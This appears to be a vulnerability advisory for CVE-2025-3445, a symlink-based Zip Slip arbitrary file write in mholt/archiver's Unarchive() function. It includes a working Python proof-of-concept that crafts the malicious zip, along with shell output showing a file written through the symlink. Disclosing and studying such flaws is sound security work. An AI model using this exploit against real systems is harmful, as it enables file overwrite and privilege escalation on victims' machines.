mholt/archiver — CVE-2025-3445
Affected versions (>=3.0.0 <4.0.0-alpha.1) of this package are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) in the Unarchive() function. An attacker can overwrite sensitive files and potentially escalate privileges by supplying a malicious archive file containing symlinks, which is unarchived by the vulnerable application.
A very similar vulnerability was found in TAR files (CVE-2024-0406).
Although a fix was implemented, it hasn't been officially released, and the affected project has since been deprecated. The successor to mholt/archiver is a new project called mholt/archives, and its initial release (v0.1.0) removes the Unarchive() functionality.
PoC || GTFO
N/ABASH
» python3 cve-2025-3445.py /tmp/sessions/admin/fake_session
ZIP file created at cve-2025-3445.zip with symlink pointing to /tmp/sessions/admin/fake_session
# Upload file to target which use Unarchive() function
root@5af68317d6cb:/app/unarchive/admin# ls -al
total 8
drwxr-xr-x 2 root root 4096 Jun 1 08:11 .
drwxr-xr-x 3 root root 4096 Jun 1 07:02 ..
lrwxrwxrwx 1 root root 32 Jun 1 08:11 x -> /tmp/sessions/admin/fake_session
root@5af68317d6cb:/app/unarchive/admin# cat /tmp/sessions/admin/fake_session
<some-file-content-here>N/APYTHON
# cve-2025-3445.py
import zipfile
import sys
import io
def create_zip(zip_path, symlink_target):
with zipfile.ZipFile(zip_path, 'w') as zip_ref:
symlink_info = zipfile.ZipInfo('./x')
symlink_info.external_attr = 0o120777 << 16 # symlink type
zip_ref.writestr(symlink_info, symlink_target)
# Optional: write content to a normal file if needed
regular_file_content = b'<some-file-content-here>'
zip_ref.writestr('x', regular_file_content)
if __name__ == "__main__":
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <path_to_symlink>")
sys.exit(1)
symlink_target = sys.argv[1]
zip_path = "cve-2025-3445.zip"
create_zip(zip_path, symlink_target)
print(f"ZIP file created at {zip_path} with symlink pointing to {symlink_target}")